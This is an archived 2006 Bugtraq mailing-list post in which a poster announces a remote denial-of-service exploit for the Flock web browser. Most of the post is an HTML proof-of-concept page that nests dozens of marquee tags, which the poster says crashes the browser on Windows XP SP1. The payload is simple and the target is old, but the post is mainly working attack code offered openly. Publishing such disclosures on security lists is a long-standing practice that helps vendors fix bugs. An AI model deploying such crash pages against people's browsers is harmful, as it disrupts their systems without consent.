lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20060623002707.6429.qmail@securityfocus.com>
Date: 23 Jun 2006 00:27:07 -0000
From: co296@....com
To: bugtraq@...urityfocus.com
Subject: flock d0s exploit remote. beta 1 (v0.7)


Credit's to n00b..Round 2 of the marquee tag's bug...

ive found a dos in flock web browser and crash's the browser ive provided a proof of concept :P...
 
thnx
 
tested on win xp pro service pack 1..
 
http://www.flock.com/


<html>
<head>
<title>flox web browser remote dos exploit by n00b :: http://www.flock.com/ ::..</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>
<p align=center>
<font size=+3 color=red>
<marquee width=175%>
Credit's to n00b..Round {2} of the marquee bug's...
</marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>
<marquee>




</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</marquee>
</font>
</p>
</body>
</html>


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ